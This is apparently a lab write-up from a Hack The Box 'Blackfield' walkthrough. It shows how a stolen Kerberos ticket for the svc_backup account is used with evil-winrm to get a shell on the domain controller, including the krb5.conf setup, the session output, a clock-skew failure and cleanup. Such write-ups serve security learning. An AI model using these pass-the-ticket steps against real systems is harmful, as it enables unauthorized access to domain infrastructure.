InfoSec LAB

Blackfield_WinRM

Created: 2 min read

WinRM

The svc_backup account is able to WinRM to the target system due to a membership the Remote Management Users group This was initially enumerated during the ldapdomaindump session as well

Now that I have secured the TGT of the svc_backup account, I can gain a foothold to the target system via WinRM

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ echo -e '[realms]\n\n\tBLACKFIELD.LOCAL = {\n\t\tkdc = dc01.blackfield.local\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	BLACKFIELD.LOCAL = {
		kdc = dc01.blackfield.local
	}

Setting up an arbitrary /etc/krb5.conf file for evil-winrm to read

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=svc_backup@dc01.blackfield.local.ccache evil-winrm -i dc01.blackfield.local -r BLACKFIELD.LOCAL       
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*evil-winrm* ps c:\Users\svc_backup\Documents> hostname
DC01
*evil-winrm* ps c:\Users\svc_backup\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . :
   ipv6 address. . . . . . . . . . . : dead:beef::283b:32d2:12e8:c7b9
   link-local ipv6 address . . . . . : fe80::283b:32d2:12e8:c7b9%17
   ipv4 address. . . . . . . . . . . : 10.10.10.192
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2

Initial Foothold established to the target system as the svc_backup account via WinRM

KRB_AP_ERR_SKEW(Clock skew too great)

*Evil-WinRM* PS C:\Users\svc_backup\Documents> systeminfo ; Get-ComputerInfo
 
Error: An error of type TypeError happened, message is no implicit conversion of nil into String
Error: Exiting with code 1
malloc(): unaligned fastbin chunk detected
zsh: IOT instruction  KRB5CCNAME=svc_backup@dc01.blackfield.local.ccache evil-winrm -i  -r

I keep getting disconnected due to the KRB_AP_ERR_SKEW error This makes thepass_the_ticket technique only challenging

Cleanup

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ sudo rm /etc/krb5.conf

Removing the /etc/krb5.conf file after use

Interactive Graph View

Backlinks